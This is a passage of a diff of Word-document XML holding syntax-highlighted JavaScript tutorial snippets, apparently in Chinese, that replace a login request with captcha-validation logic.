+              </w:rPr>
+              <w:t>;</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13254,16 +16947,28 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:numPr>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:spacing w:before="53" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="1"/>
-        <w:ind w:leftChars="200"/>
-      </w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>添加验证码逻辑</w:t>
+      </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -13280,7 +16985,9 @@
         </w:tblBorders>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
+          <w:top w:w="0" w:type="dxa"/>
           <w:left w:w="108" w:type="dxa"/>
+          <w:bottom w:w="0" w:type="dxa"/>
           <w:right w:w="108" w:type="dxa"/>
         </w:tblCellMar>
       </w:tblPr>
@@ -13298,6 +17005,12 @@
             <w:insideV w:val="single" w:color="auto" w:sz="4" w:space="0"/>
           </w:tblBorders>
           <w:tblLayout w:type="fixed"/>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:left w:w="108" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+            <w:right w:w="108" w:type="dxa"/>
+          </w:tblCellMar>
         </w:tblPrEx>
         <w:tc>
           <w:tcPr>
@@ -13324,6 +17037,32 @@
               <w:rPr>
                 <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                 <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>if</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(!</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
                 <w:color w:val="9CDCFE"/>
                 <w:kern w:val="0"/>
                 <w:sz w:val="21"/>
@@ -13331,7 +17070,7 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>axios</w:t>
+              <w:t>data</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13350,58 +17089,6 @@
               <w:rPr>
                 <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                 <w:b w:val="0"/>
-                <w:color w:val="DCDCAA"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>post</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="CE9178"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>'/user/login'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
                 <w:color w:val="9CDCFE"/>
                 <w:kern w:val="0"/>
                 <w:sz w:val="21"/>
@@ -13409,98 +17096,20 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>data</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>).</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="DCDCAA"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>then</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>((</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>data</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve">) </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="569CD6"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>=&gt;</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> {</w:t>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>) {</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13531,7 +17140,7 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>        </w:t>
+              <w:t>            </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13544,7 +17153,59 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>if</w:t>
+              <w:t>throw</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>new</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>Error</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13563,183 +17224,27 @@
               <w:rPr>
                 <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                 <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>data</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>status</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> === </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="B5CEA8"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>200</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> &amp;&amp; </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>data</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>data</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>status</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> === </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="B5CEA8"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>0</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>){</w:t>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'验证码为空'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13770,20 +17275,7 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>            </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="6A9955"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>// location.href = '/';</w:t>
+              <w:t>        }</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13814,33 +17306,59 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>            </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="4EC9B0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>console</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
+              <w:t>        </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13853,7 +17371,7 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>log</w:t>
+              <w:t>require</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13879,7 +17397,7 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>'登录成功'</w:t>
+              <w:t>'../tools/captcha'</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13923,33 +17441,267 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>        }</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="C586C0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>else</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>{</w:t>
+              <w:t>        </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
